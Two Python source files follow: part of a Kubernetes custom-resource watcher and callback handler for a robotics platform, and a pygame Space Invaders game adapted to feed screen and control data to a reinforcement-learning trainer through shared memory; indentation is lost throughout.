self.status_update_method = self.co_api.patch_namespaced_custom_object
try:
api_response = self.crd_api.read_custom_resource_definition(
name, _request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when calling ApiextensionsV1beta1Api->'
'read_custom_resource_definition: %s', self.group, self.plural, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully read custom resource definition %s', self.group, self.plural,
name)
if api_response.spec.subresources is not None:
if api_response.spec.subresources.status is not None:
self.status_update_method = self.co_api.patch_namespaced_custom_object_status
_LOGGER.info('There is a status subresource defined in CRD %s', name)
return
_LOGGER.info('There is no status subresource defined in CRD %s', name)
def register_callback(
self, name: str, operations: List, callback: Callable[[str, Dict], None],
robot_name: Optional[str] = None) -> None:
"""
Register a callback function.
example cb: def callback(name: str, custom_res: Dict) -> None:
"""
cls = self.__class__
with self.callbacks_lock:
# Check for invalid operations
for operation in operations:
if operation not in cls.VALID_EVENT_TYPES:
raise ValueError(
'{}/{}: "{}" is not a valid event type'.format(
self.group, self.plural, operation))
# Check if callback is callable
if callable(callback) is False:
raise TypeError('{}/{}: Object "{}" is not callable'.format(
self.group, self.plural, callback))
# Assign the right callback attribute
log_suffix = ' for robot {}'.format(robot_name) if robot_name is not None else ''
if robot_name is None:
callbacks = self.callbacks
elif self.robot_callbacks.get(robot_name) is None:
callbacks = self.get_callback_dict()
self.robot_callbacks[robot_name] = callbacks
else:
callbacks = self.robot_callbacks[robot_name]
# Check if a callback with the same name is already registered
already_registered = False
for operation, callback_list in callbacks.items():
if name in callback_list:
already_registered = True
# Raise ValueError if the callback already exists, otherwise register it
if already_registered:
raise ValueError(
'{}/{}: A callback with that name is already registered{}'.format(
self.group, self.plural, log_suffix))
for operation in operations:
callbacks[operation][name] = callback
_LOGGER.info(
'%s/%s: Callback %s registered to operation %s%s', self.group, self.plural,
name, operation, log_suffix)
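# Hypothetical registration sketch (handler, callback and CR names are assumptions):
#
#     def on_order_change(name: str, custom_res: Dict) -> None:
#         _LOGGER.info('Order CR %s changed', name)
#
#     handler.register_callback('order-logger', ['ADDED', 'MODIFIED'], on_order_change)
#     handler.run(reprocess=True)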
def unregister_callback(self, name: str, robot_name: Optional[str] = None) -> None:
"""Unregister a Pub/Sub order manager queue callback function."""
with self.callbacks_lock:
# Assign the right callback attribute
log_suffix = ' for robot {}'.format(robot_name) if robot_name is not None else ''
if robot_name is None:
callbacks = self.callbacks
elif self.robot_callbacks.get(robot_name) is None:
return
else:
callbacks = self.robot_callbacks[robot_name]
# Unregister callback
for operation in callbacks:
removed = callbacks[operation].pop(name, None)
if removed:
_LOGGER.info(
'%s/%s: Callback %s unregistered from operation %s%s', self.group,
self.plural, name, operation, log_suffix)
def run(self, reprocess: bool = False,
multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Optionally supports multiple executor threads for blocking callbacks.
"""
if self.thread_run:
# Restart the ThreadPoolExecutor so it no longer runs with the default max_workers=1
if multiple_executor_threads:
self.executor.shutdown()
self.executor = ThreadPoolExecutor(max_workers=5)
_LOGGER.info(
'Watching for changes on %s.%s/%s', self.plural, self.group, self.version)
self.watcher_thread.start()
# Wait until cache is initialized
while self._cr_cache_initialized is False:
time.sleep(0.01)
self.synchronize_thread.start()
if reprocess:
self.reprocess_thread.start()
else:
_LOGGER.error(
'Runner thread for %s/%s is currently deactivated', self.group, self.plural)
def _cache_custom_resource(self, name: str, operation: str, custom_res: Dict) -> None:
"""Cache this custom resource."""
with self._cr_cache_lock:
if operation in ('ADDED', 'MODIFIED'):
self._cr_cache[name] = custom_res
elif operation == 'DELETED':
self._cr_cache.pop(name, None)
def _refresh_custom_resource_cache(self) -> Dict[str, Dict]:
"""Refresh custom resource cache from a list with custom resources."""
_LOGGER.debug("Refreshing custom resource cache")
with self._cr_cache_lock:
cr_resp = self._list_all_cr()
crs = cr_resp['items']
cr_cache = {}
for obj in crs:
metadata = obj.get('metadata')
if not metadata:
continue
name = metadata['name']
cr_cache[name] = obj
self._cr_cache = cr_cache
return cr_resp
def _synchronize_cache_loop(self) -> None:
"""Synchronize custom resource cache every 5 minutes."""
while self.thread_run:
time.sleep(300)
try:
self._refresh_custom_resource_cache()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error refreshing CR cache: %s', self.group, self.plural, err,
exc_info=True)
# On an unhandled exception in the thread, save the exception
self.thread_exceptions['cr-cache-synchronizer'] = err
# Stop the watcher
self.stop_watcher()
@k8s_cr_callback
def _callback(self, name: str, labels: Dict, operation: str, custom_res: Dict) -> None:
"""Process custom resource operation."""
robot_name = labels.get('cloudrobotics.com/robot-name', '')
# Run all registered callback functions
with self.callbacks_lock:
callbacks = list(self.callbacks[operation].values())
if self.robot_callbacks.get(robot_name) is not None:
callbacks.extend(self.robot_callbacks[robot_name][operation].values())
try:
for callback in callbacks:
callback(name, custom_res)
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error in callback when processing CR %s: %s', self.group, self.plural,
name, err, exc_info=True)
else:
_LOGGER.debug(
'%s/%s: Successfully processed custom resource %s', self.group, self.plural, name)
def _watch_on_crs(self) -> None:
"""Stream events on orders and execute callbacks."""
_LOGGER.info(
'%s/%s: Starting watcher at resourceVersion "%s"',
self.group, self.plural, self.resv_watcher)
try:
self.watcher = watch.Watch()
stream = self.watcher.stream(
self.co_api.list_namespaced_custom_object,
self.group,
self.version,
self.namespace,
self.plural,
label_selector=self.label_selector,
resource_version=self.resv_watcher
)
for event in stream:
# Break loop when thread stops
if not self.thread_run:
break
# Process event
obj = event['object']
operation = event['type']
# Too old resource version error handling
# https://github.com/kubernetes-client/python/issues/609
# Obsolete as of Python client version 12, which includes this PR:
# https://github.com/kubernetes-client/python-base/pull/133/files
# Now an ApiException is raised instead
if obj.get('code') == 410:
new_version = parse_too_old_failure(obj.get('message'))
if new_version is not None:
self.resv_watcher = str(new_version)
_LOGGER.error(
'Updating resource version to %s due to "too old resource version" '
'error', new_version)
# CRD could be the reason for a too old resource version error
# Refresh status update method
self.get_status_update_method()
break
# Skip CRs without metadata
metadata = obj.get('metadata')
if not metadata:
continue
if metadata.get('resourceVersion'):
self.resv_watcher = metadata['resourceVersion']
name = metadata['name']
labels = metadata.get('labels', {})
_LOGGER.debug(
'%s/%s: Handling %s on %s', self.group, self.plural,
operation, name)
# Cache custom resource
self._cache_custom_resource(name, operation, obj)
# Submit callbacks to ThreadPoolExecutor
self.executor.submit(self._callback, name, labels, operation, obj)
except ApiException as err:
if err.status == 410:
new_version = parse_too_old_failure(err.reason)
if new_version is not None:
self.resv_watcher = str(new_version)
_LOGGER.error(
'Updating resource version to %s due to "too old resource version" '
'error', new_version)
# CRD could be the reason for a too old resource version error
# Refresh status update method
self.get_status_update_method()
return
# If resource version could not be updated, reset it to allow a clean restart
self.resv_watcher = ''
_LOGGER.error(
'%s/%s: Exception when watching CustomObjectsApi: %s',
self.group, self.plural, err)
# On unknown errors backoff for a maximum of 60 seconds
self.err_count_watcher += 1
backoff = min(60, self.err_count_watcher)
_LOGGER.info('%s/%s: Backing off for %s seconds', self.group, self.plural, backoff)
time.sleep(backoff)
else:
# Reset error counter
self.err_count_watcher = 0
def _init_watcher(self) -> None:
"""Initialize CR watcher."""
# Sync cache
cr_resp = self._refresh_custom_resource_cache()
self._cr_cache_initialized = True
_LOGGER.debug(
'%s/%s: Initialize CR watcher: Got all CRs. Cache synced', self.group, self.plural)
if cr_resp:
# Set resource version for watcher to the version of the list. According to
# https://github.com/kubernetes-client/python/issues/693#issuecomment-442893494
# and https://github.com/kubernetes-client/python/issues/819#issuecomment-491630022
resource_version = cr_resp.get('metadata', {}).get('resourceVersion')
if resource_version is None:
_LOGGER.error('Could not determine resourceVersion. Start from the beginning')
self.resv_watcher = ''
else:
self.resv_watcher = resource_version
# Process custom resources
for obj in cr_resp['items']:
metadata = obj.get('metadata')
if not metadata:
continue
name = metadata['name']
labels = metadata.get('labels', {})
# Submit callbacks to ThreadPoolExecutor
self.executor.submit(
self._callback, name, labels, 'ADDED', obj)
def _watch_on_crs_loop(self) -> None:
"""Start watching on custom resources in a loop."""
_LOGGER.info(
'%s/%s: Start watching on custom resources', self.group, self.plural)
while self.thread_run:
try:
if self.resv_watcher == '':
self._init_watcher()
self._watch_on_crs()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error watching custom resources: %s', self.group, self.plural, err,
exc_info=True)
# On an unhandled exception in the thread, save the exception
self.thread_exceptions['watcher'] = err
# Stop the watcher
self.stop_watcher()
finally:
if self.thread_run:
_LOGGER.debug('%s/%s: Restarting watcher', self.group, self.plural)
_LOGGER.info("Custom resource watcher stopped")
def update_cr_status(self, name: str, status: Dict) -> None:
"""Update the status field of named cr."""
cls = self.__class__
custom_res = {'status': status}
try:
self.status_update_method(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when updating CR status of %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully updated status of CR %s', self.group, self.plural, name)
def update_cr_spec(
self, name: str, spec: Dict, labels: Optional[Dict] = None,
owner_cr: Optional[Dict] = None) -> None:
"""Update the status field of named cr."""
cls = self.__class__
custom_res = {'spec': spec}
# Optionally change labels
if labels is not None:
custom_res['metadata'] = {'labels': labels}
# Optionally add controller reference
if owner_cr is not None:
custom_res = self.set_controller_reference(custom_res, owner_cr)
try:
self.co_api.patch_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when updating CR spec of %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully updated spec of CR %s', self.group, self.plural, name)
def delete_cr(self, name: str) -> None:
"""Delete specific custom resource by name."""
cls = self.__class__
try:
self.co_api.delete_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when deleting CR of %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully deleted CR %s', self.group, self.plural, name)
def create_cr(
self, name: str, labels: Dict, spec: Dict, owner_cr: Optional[Dict] = None) -> None:
"""Create custom resource on 'orders' having json parameter as spec."""
cls = self.__class__
custom_res = copy.deepcopy(self.raw_cr)
custom_res['metadata']['name'] = name
custom_res['metadata']['labels'] = labels
custom_res['spec'] = spec
if owner_cr is not None:
custom_res = self.set_controller_reference(custom_res, owner_cr)
try:
self.co_api.create_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when creating CR %s: %s', self.group, self.plural, name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully created CR %s', self.group, self.plural, name)
def get_cr(self, name: str, use_cache: bool = True) -> Dict:
"""Retrieve a specific custom resource by name."""
cls = self.__class__
if use_cache is True:
try:
return copy.deepcopy(self._cr_cache[name])
except KeyError as err:
_LOGGER.error(
'%s/%s: Exception when retrieving CR %s: not found', self.group, self.plural,
name)
raise ApiException(status=404) from err
try:
api_response = self.co_api.get_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when retrieving CR %s: %s', self.group, self.plural, name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully retrieved CR %s', self.group, self.plural, name)
return api_response
def check_cr_exists(self, name: str, use_cache: bool = True) -> bool:
"""Check if a cr exists by name."""
cls = self.__class__
if use_cache is True:
return bool(self._cr_cache.get(name))
try:
self.co_api.get_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
if err.status == 404:
return False
_LOGGER.error(
'%s/%s: Exception when retrieving CR %s: %s', self.group, self.plural, name, err)
raise
else:
return True
def list_all_cr(self, use_cache: bool = True) -> List[Dict]:
"""List all currently available custom resources of a kind."""
if use_cache is True:
return copy.deepcopy(list(self._cr_cache.values()))
return self._list_all_cr().get('items', [])
def _list_all_cr(self) -> Dict:
"""List all currently available custom resources of a kind internally."""
cls = self.__class__
try:
api_response = self.co_api.list_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
label_selector=self.label_selector,
_request_timeout=cls.REQUEST_TIMEOUT
)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when listing CRs: %s', self.group, self.plural, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully listed all CRs', self.group, self.plural)
return api_response
def process_all_crs(self) -> None:
"""
Reprocess custom resources.
This method processes all existing custom resources with the REPROCESS operation.
"""
_LOGGER.debug('%s/%s: CR reprocess started', self.group, self.plural)
with self._cr_cache_lock:
crs = copy.deepcopy(list(self._cr_cache.values()))
futures: List[Future] = []
for obj in crs:
metadata = obj.get('metadata')
if not metadata:
continue
name = metadata['name']
labels = metadata.get('labels', {})
# Submit callbacks to ThreadPoolExecutor
futures.append(self.executor.submit(
self._callback, name, labels, 'REPROCESS', obj))
# Wait for all futures
for future in futures:
future.result()
def _reprocess_crs_loop(self) -> None:
"""Reprocess existing custom resources in a loop."""
_LOGGER.info(
'Start continuously reprocessing existing custom resources')
last_run = time.time()
while self.thread_run:
try:
self.process_all_crs()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error reprocessing custom resources: %s', self.group, self.plural, err,
exc_info=True)
self.thread_exceptions['reprocessor'] = err
# Stop the watcher
self.stop_watcher()
finally:
# Wait up to self.reprocess_waiting_time seconds
if self.thread_run:
time.sleep(max(0, last_run - time.time() + self.reprocess_waiting_time))
last_run = time.time()
_LOGGER.info("Reprocessing custom resources stopped")
def stop_watcher(self) -> None:
"""Stop watching CR stream."""
self.thread_run = False
_LOGGER.info('Stopping watcher for %s/%s', self.group, self.plural)
self.watcher.stop()
_LOGGER.info('Stopping ThreadPoolExecutor')
self.executor.shutdown(wait=False)
def add_finalizer(self, name: str, finalizer: str) -> bool:
"""Add a finalizer to a CR."""
cls = self.__class__
if self.check_cr_exists(name):
# Get current finalizers
cr_resp = self.get_cr(name)
finalizers = cr_resp['metadata'].get('finalizers', [])
# Add finalizer to the list
finalizers.append(finalizer)
custom_res = {'metadata': {'finalizers': finalizers}}
# Update CR
try:
self.co_api.patch_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when adding finalizer to CR %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug('Added finalizer %s to CR %s', finalizer, name)
return True
else:
_LOGGER.error('Unable to add finalizer to CR %s. CR not found', name)
return False
def remove_finalizer(self, name: str, finalizer: str) -> bool:
"""Remove a finalizer from a CR."""
cls = self.__class__
if self.check_cr_exists(name):
# Get current finalizers
cr_resp = self.get_cr(name)
finalizers = cr_resp['metadata'].get('finalizers', [])
# Remove finalizer from list
try:
finalizers.remove(finalizer)
except ValueError:
_LOGGER.error(
'Unable to remove finalizer from CR %s. Finalizer %s not found', name,
finalizer)
return False
custom_res = {'metadata': {'finalizers': finalizers}}
# Update CR
try:
self.co_api.patch_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when removing finalizer from CR %s: %s', self.group,
self.plural, name, err)
raise
else:
_LOGGER.debug('Removed finalizer %s from CR %s', finalizer, name)
return True
else:
_LOGGER.error('Unable to remove finalizer from CR %s. CR not found', name)
return False
@staticmethod
def set_controller_reference(controlled_cr: Dict, owner_cr: Dict) -> Dict:
"""Set controller reference to custom resource."""
controller_reference = {
'apiVersion': owner_cr['apiVersion'],
'blockOwnerDeletion': True,
'controller': True,
'kind': owner_cr['kind'],
'name': owner_cr['metadata']['name'],
'uid': owner_cr['metadata']['uid']
}
refs = controlled_cr['metadata'].get('ownerReferences', [])
existing = False
for ref in refs:
if ref.get('controller') is True:
existing = True
if existing is False:
refs.append(controller_reference)
controlled_cr['metadata']['ownerReferences'] = refs
return controlled_cr
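# A minimal usage sketch of the callback API defined above, assuming `handler` is an
# already constructed instance of the handler class in this module (constructor
# arguments are deployment-specific and therefore not shown here).
def _example_register_logging_callback(handler) -> None:
    """Register a callback that logs every ADDED/MODIFIED custom resource, then start watching."""
    def log_cr(name: str, custom_res: Dict) -> None:
        # Called by the handler's executor with the CR name and its full body
        _LOGGER.info('CR %s changed, spec: %s', name, custom_res.get('spec'))

    handler.register_callback('log-crs', ['ADDED', 'MODIFIED'], log_cr)
    handler.run(reprocess=False)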
|
spaceinvaders.py
|
#!/usr/bin/env python
# Space Invaders
# Created by Lee Robinson
if __name__ == '__main__':
import sys
from os.path import abspath, dirname
from random import choice
import multiprocessing
from multiprocessing import shared_memory
import torch
import math as m
import time as t
from torchvision import transforms
import training
shm_screen = shared_memory.SharedMemory(create=True, size=1920000)
shm_stats = shared_memory.SharedMemory(create=True, size=17)
shm_controls = shared_memory.SharedMemory(create=True, size=3)
shm_player_input = shared_memory.SharedMemory(create=True, size=3)
shm_gameover = shared_memory.SharedMemory(create=True, size=1)
shm_screen_name = shm_screen.name
shm_stats_name = shm_stats.name
shm_controls_name = shm_controls.name
shm_player_input_name = shm_player_input.name
shm_gameover_name = shm_gameover.name
enemyBulletsList = []
def getKey(index):
return shm_controls.buf[index]
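# Shared-memory layout, as inferred from its usage below: the agent writes its actions
# into shm_controls (buf[0] = move left, buf[1] = move right, buf[2] = shoot), while
# shm_player_input mirrors the human player's LEFT/RIGHT (and SPACE) keys and
# shm_gameover.buf[0] flags the end of an episode for the trainer process.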
p = multiprocessing.Process(target=training.training_stuff, args=[shm_screen_name, shm_stats_name, shm_controls_name, shm_gameover_name, shm_player_input_name])
p.start()
import pygame
from pygame import *
BASE_PATH = abspath(dirname(__file__))
FONT_PATH = BASE_PATH + '/fonts/'
IMAGE_PATH = BASE_PATH + '/images/'
SOUND_PATH = BASE_PATH + '/sounds/'
# Colors (R, G, B)
WHITE = (255, 255, 255)
GREEN = (78, 255, 87)
YELLOW = (241, 255, 0)
BLUE = (80, 255, 239)
PURPLE = (203, 0, 255)
RED = (237, 28, 36)
SCREEN = display.set_mode((800, 600))
FONT = FONT_PATH + 'space_invaders.ttf'
IMG_NAMES = ['ship', 'mystery',
'enemy1_1', 'enemy1_2',
'enemy2_1', 'enemy2_2',
'enemy3_1', 'enemy3_2',
'explosionblue', 'explosiongreen', 'explosionpurple',
'laser', 'enemylaser']
IMAGES = {name: image.load(IMAGE_PATH + '{}.png'.format(name)).convert_alpha()
for name in IMG_NAMES}
BLOCKERS_POSITION = 450
ENEMY_DEFAULT_POSITION = 65 # Initial value for a new game
ENEMY_MOVE_DOWN = 35
class Ship(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = IMAGES['ship']
self.rect = self.image.get_rect(topleft=(375, 540))
self.speed = 5
def update(self, keys, *args):
if getKey(0) and self.rect.x > 10:
self.rect.x -= self.speed
if getKey(1) and self.rect.x < 740:
self.rect.x += self.speed
game.screen.blit(self.image, self.rect)
class Bullet(sprite.Sprite):
def __init__(self, xpos, ypos, direction, speed, filename, side):
sprite.Sprite.__init__(self)
self.image = IMAGES[filename]
self.rect = self.image.get_rect(topleft=(xpos, ypos))
self.speed = speed
self.direction = direction
self.side = side
self.filename = filename
def update(self, keys, *args):
game.screen.blit(self.image, self.rect)
self.rect.y += self.speed * self.direction
if self.rect.y < 15 or self.rect.y > 600:
self.kill()
class Enemy(sprite.Sprite):
def __init__(self, row, column):
sprite.Sprite.__init__(self)
self.row = row
self.column = column
self.images = []
self.load_images()
self.index = 0
self.image = self.images[self.index]
self.rect = self.image.get_rect()
def toggle_image(self):
self.index += 1
if self.index >= len(self.images):
self.index = 0
self.image = self.images[self.index]
def update(self, *args):
game.screen.blit(self.image, self.rect)
def load_images(self):
images = {0: ['1_2', '1_1'],
1: ['2_2', '2_1'],
2: ['2_2', '2_1'],
3: ['3_1', '3_2'],
4: ['3_1', '3_2'],
}
img1, img2 = (IMAGES['enemy{}'.format(img_num)] for img_num in
images[self.row])
self.images.append(transform.scale(img1, (40, 35)))
self.images.append(transform.scale(img2, (40, 35)))
class EnemiesGroup(sprite.Group):
def __init__(self, columns, rows):
sprite.Group.__init__(self)
self.enemies = [[None] * columns for _ in range(rows)]
self.columns = columns
self.rows = rows
self.leftAddMove = 0
self.rightAddMove = 0
self.moveTime = 600
self.direction = 1
self.rightMoves = 30
self.leftMoves = 30
self.moveNumber = 15
self.timer = time.get_ticks()
self.bottom = game.enemyPosition + ((rows - 1) * 45) + 35
self._aliveColumns = list(range(columns))
self._leftAliveColumn = 0
self._rightAliveColumn = columns - 1
def update(self, current_time):
if current_time - self.timer > self.moveTime:
if self.direction == 1:
max_move = self.rightMoves + self.rightAddMove
else:
max_move = self.leftMoves + self.leftAddMove
if self.moveNumber >= max_move:
self.leftMoves = 30 + self.rightAddMove
self.rightMoves = 30 + self.leftAddMove
self.direction *= -1
self.moveNumber = 0
self.bottom = 0
for enemy in self:
#enemy.rect.y += ENEMY_MOVE_DOWN
enemy.toggle_image()
if self.bottom < enemy.rect.y + 35:
self.bottom = enemy.rect.y + 35
else:
velocity = 10 if self.direction == 1 else -10
for enemy in self:
#enemy.rect.x += velocity
enemy.toggle_image()
self.moveNumber += 1
self.timer += self.moveTime
def add_internal(self, *sprites):
super(EnemiesGroup, self).add_internal(*sprites)
for s in sprites:
self.enemies[s.row][s.column] = s
def remove_internal(self, *sprites):
super(EnemiesGroup, self).remove_internal(*sprites)
for s in sprites:
self.kill(s)
self.update_speed()
def is_column_dead(self, column):
return not any(self.enemies[row][column]
for row in range(self.rows))
def random_bottom(self):
col = choice(self._aliveColumns)
col_enemies = (self.enemies[row - 1][col]
for row in range(self.rows, 0, -1))
return next((en for en in col_enemies if en is not None), None)
def update_speed(self):
if len(self) == 1:
self.moveTime = 200
elif len(self) <= 10:
self.moveTime = 400
def kill(self, enemy):
self.enemies[enemy.row][enemy.column] = None
is_column_dead = self.is_column_dead(enemy.column)
if is_column_dead:
self._aliveColumns.remove(enemy.column)
if enemy.column == self._rightAliveColumn:
while self._rightAliveColumn > 0 and is_column_dead:
self._rightAliveColumn -= 1
self.rightAddMove += 5
is_column_dead = self.is_column_dead(self._rightAliveColumn)
elif enemy.column == self._leftAliveColumn:
while self._leftAliveColumn < self.columns and is_column_dead:
self._leftAliveColumn += 1
self.leftAddMove += 5
is_column_dead = self.is_column_dead(self._leftAliveColumn)
class Blocker(sprite.Sprite):
def __init__(self, size, color, row, column):
sprite.Sprite.__init__(self)
self.height = size
self.width = size
self.color = color
self.image = Surface((self.width, self.height))
self.image.fill(self.color)
self.rect = self.image.get_rect()
self.row = row
self.column = column
def update(self, keys, *args):
game.screen.blit(self.image, self.rect)
class Mystery(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = IMAGES['mystery']
self.image = transform.scale(self.image, (75, 35))
self.rect = self.image.get_rect(topleft=(-80, 45))
self.row = 5
self.moveTime = 25000
self.direction = 1
self.timer = time.get_ticks()
self.mysteryEntered = mixer.Sound(SOUND_PATH + 'mysteryentered.wav')
self.mysteryEntered.set_volume(0.3)
self.playSound = True
def update(self, keys, currentTime, *args):
resetTimer = False
passed = currentTime - self.timer
if passed > self.moveTime:
if (self.rect.x < 0 or self.rect.x > 800) and self.playSound:
#self.mysteryEntered.play()
self.playSound = False
if self.rect.x < 840 and self.direction == 1:
self.mysteryEntered.fadeout(4000)
self.rect.x += 2
game.screen.blit(self.image, self.rect)
if self.rect.x > -100 and self.direction == -1:
self.mysteryEntered.fadeout(4000)
self.rect.x -= 2
game.screen.blit(self.image, self.rect)
if self.rect.x > 830:
self.playSound = True
self.direction = -1
resetTimer = True
if self.rect.x < -90:
self.playSound = True
self.direction = 1
resetTimer = True
if passed > self.moveTime and resetTimer:
self.timer = currentTime
class EnemyExplosion(sprite.Sprite):
def __init__(self, enemy, *groups):
super(EnemyExplosion, self).__init__(*groups)
self.image = transform.scale(self.get_image(enemy.row), (40, 35))
self.image2 = transform.scale(self.get_image(enemy.row), (50, 45))
self.rect = self.image.get_rect(topleft=(enemy.rect.x, enemy.rect.y))
self.timer = time.get_ticks()
@staticmethod
def get_image(row):
img_colors = ['purple', 'blue', 'blue', 'green', 'green']
return IMAGES['explosion{}'.format(img_colors[row])]
def update(self, current_time, *args):
passed = current_time - self.timer
if passed <= 100:
game.screen.blit(self.image, self.rect)
elif passed <= 200:
game.screen.blit(self.image2, (self.rect.x - 6, self.rect.y - 6))
elif 400 < passed:
self.kill()
class MysteryExplosion(sprite.Sprite):
def __init__(self, mystery, score, *groups):
super(MysteryExplosion, self).__init__(*groups)
self.text = Text(FONT, 20, str(score), WHITE,
mystery.rect.x + 20, mystery.rect.y + 6)
self.timer = time.get_ticks()
def update(self, current_time, *args):
passed = current_time - self.timer
if passed <= 200 or 400 < passed <= 600:
self.text.draw(game.screen)
elif 600 < passed:
self.kill()
class ShipExplosion(sprite.Sprite):
def __init__(self, ship, *groups):
super(ShipExplosion, self).__init__(*groups)
self.image = IMAGES['ship']
self.rect = self.image.get_rect(topleft=(ship.rect.x, ship.rect.y))
self.timer = time.get_ticks()
def update(self, current_time, *args):
passed = current_time - self.timer
if 300 < passed <= 600:
game.screen.blit(self.image, self.rect)
elif 900 < passed:
self.kill()
class Life(sprite.Sprite):
def __init__(self, xpos, ypos):
sprite.Sprite.__init__(self)
self.image = IMAGES['ship']
self.image = transform.scale(self.image, (23, 23))
self.rect = self.image.get_rect(topleft=(xpos, ypos))
def update(self, *args):
game.screen.blit(self.image, self.rect)
class Text(object):
def __init__(self, textFont, size, message, color, xpos, ypos):
self.font = font.Font(textFont, size)
self.surface = self.font.render(message, True, color)
self.rect = self.surface.get_rect(topleft=(xpos, ypos))
def draw(self, surface):
surface.blit(self.surface, self.rect)
class SpaceInvaders(object):
def __init__(self):
# On Linux a buffer size of 512 seems to be insufficient; use 4096 to prevent:
# ALSA lib pcm.c:7963:(snd_pcm_recover) underrun occurred
mixer.pre_init(44100, -16, 1, 4096)
init()
self.clock = time.Clock()
self.caption = display.set_caption('Space Invaders')
self.screen = SCREEN
self.background = image.load(IMAGE_PATH + 'background.jpg').convert()
self.startGame = False
self.mainScreen = True
self.gameOver = False
# Counter for enemy starting position (increased each new round)
self.enemyPosition = ENEMY_DEFAULT_POSITION
self.titleText = Text(FONT, 50, 'Space Invaders', WHITE, 164, 155)
self.titleText2 = Text(FONT, 25, 'Press any key to continue', WHITE,
201, 225)
self.gameOverText = Text(FONT, 50, 'Game Over', WHITE, 250, 270)
self.nextRoundText = Text(FONT, 50, 'Next Round', WHITE, 240, 270)
self.enemy1Text = Text(FONT, 25, ' = 10 pts', GREEN, 368, 270)
self.enemy2Text = Text(FONT, 25, ' = 20 pts', BLUE, 368, 320)
self.enemy3Text = Text(FONT, 25, ' = 30 pts', PURPLE, 368, 370)
self.enemy4Text = Text(FONT, 25, ' = ?????', RED, 368, 420)
self.scoreText = Text(FONT, 20, 'Score', WHITE, 5, 5)
self.livesText = Text(FONT, 20, 'Lives ', WHITE, 640, 5)
self.life1 = Life(715, 3)
self.life2 = Life(742, 3)
self.life3 = Life(769, 3)
self.livesGroup = sprite.Group()#self.life1, self.life2, self.life3)
self.score = 0
def reset(self, score):
self.player = Ship()
self.playerGroup = sprite.Group(self.player)
self.explosionsGroup = sprite.Group()
self.bullets = sprite.Group()
self.mysteryShip = Mystery()
self.mysteryGroup = sprite.Group(self.mysteryShip)
self.enemyBullets = sprite.Group()
self.make_enemies()
self.allSprites = sprite.Group(self.player, self.enemies,
self.livesGroup, self.mysteryShip)
self.keys = key.get_pressed()
self.timer = time.get_ticks()
self.noteTimer = time.get_ticks()
self.shipTimer = time.get_ticks()
self.score = score
self.create_audio()
self.makeNewShip = False
self.shipAlive = True
def make_blockers(self, number):
blockerGroup = sprite.Group()
# for row in range(4):
# for column in range(9):
# blocker = Blocker(10, GREEN, row, column)
# blocker.rect.x = 50 + (200 * number) + (column * blocker.width)
# blocker.rect.y = BLOCKERS_POSITION + (row * blocker.height)
# blockerGroup.add(blocker)
return blockerGroup
def create_audio(self):
self.sounds = {}
for sound_name in ['shoot', 'shoot2', 'invaderkilled', 'mysterykilled',
'shipexplosion']:
self.sounds[sound_name] = mixer.Sound(
SOUND_PATH + '{}.wav'.format(sound_name))
self.sounds[sound_name].set_volume(0.2)
self.musicNotes = [mixer.Sound(SOUND_PATH + '{}.wav'.format(i)) for i
in range(4)]
for sound in self.musicNotes:
sound.set_volume(0.5)
self.noteIndex = 0
def play_main_music(self, currentTime):
if currentTime - self.noteTimer > self.enemies.moveTime:
self.note = self.musicNotes[self.noteIndex]
if self.noteIndex < 3:
self.noteIndex += 1
else:
self.noteIndex = 0
#self.note.play()
self.noteTimer += self.enemies.moveTime
@staticmethod
def should_exit(evt):
# type: (pygame.event.EventType) -> bool
return evt.type == QUIT or (evt.type == KEYUP and evt.key == K_ESCAPE)
def check_input(self):
self.keys = key.get_pressed()
if getKey(2) and False:
if len(self.bullets) == 0 and self.shipAlive:
if self.score < 1000:
bullet = Bullet(self.player.rect.x + 23,
self.player.rect.y + 5, -1,
15, 'laser', 'center')
self.bullets.add(bullet)
self.allSprites.add(self.bullets)
#self.sounds['shoot'].play()
